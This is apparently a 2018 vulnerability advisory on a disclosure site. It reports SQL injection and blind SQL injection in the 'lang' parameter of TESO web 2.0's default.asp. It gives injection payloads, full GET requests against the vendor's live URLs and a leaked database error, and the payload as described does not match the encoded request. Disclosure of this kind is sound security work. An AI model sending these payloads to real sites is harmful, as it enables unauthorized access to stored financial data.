TESO web 2.0 SQLInjection/ Blind SQLInjection

2018.10.22
es Juan Carlos Garcia (ES) es
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

TESO web 2.0 SQLInjection/ Blind SQLInjection I. VULNERABILITY ------------------------- #Title: TESO SQLInjection/ Blind SQLInjection #Vendor:http://www.tesoweb.com #Author:Juan Carlos García (@secnight) #Follow us @habemuscurso http://hackingmadrid.blogspot.com @secnight II. DESCRIPTION ------------------------- TESO is a powerful, free lets you take control of your money and your portfolio, both at home and in your business. Its main features are: Privacy and confidentiality. TESO stores no personal information nor are they ask in the registry. Police their keys and no one can associate with the accounts stored in TESO. Bank Reconciliation. TESO to load bank statements to compare (reconcile) with its own accounting. Investment Securities. TESO updates the latest quotes from more than 1000 European and American values​​, evaluate your portfolio and calculates realized and unrealized capital gains. You can manage your portfolio TESO without carrying a full accounting of your money Established that is not safe, it is not private and are in danger of data confidentiality III. PROOF OF CONCEPT ------------------------- ##Blind SQLInjection Affected items /default.asp Attack details URL encoded GET input lang was set to -1' or '3'='3 GET /default.asp?lang=-1%27%20or%204%20%3d%20%275 HTTP/1.1 http://www.tesoweb.es/default.asp?lang=-1%27%20or%204%20%3d%20%275 ##SQLinjection Affected items /default.asp Attack details URL encoded GET input lang was set to 1' Error message found: <font face="Arial" size=2>Syntax error in string in query expression '((idioma = '1'') and (activa = True)) order by fecha desc'.</font> GET /default.asp?lang=1%27 HTTP/1.1 http://www.tesoweb.es/default.asp?lang=1%27 IV SOLUTION ------------------------ The script should filter metacharacters from user input. It's absolutely vital to sanitize user inputs to insure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out some dangerous characters, it's harder to point to all of them. V. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García (@secnight) VII. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top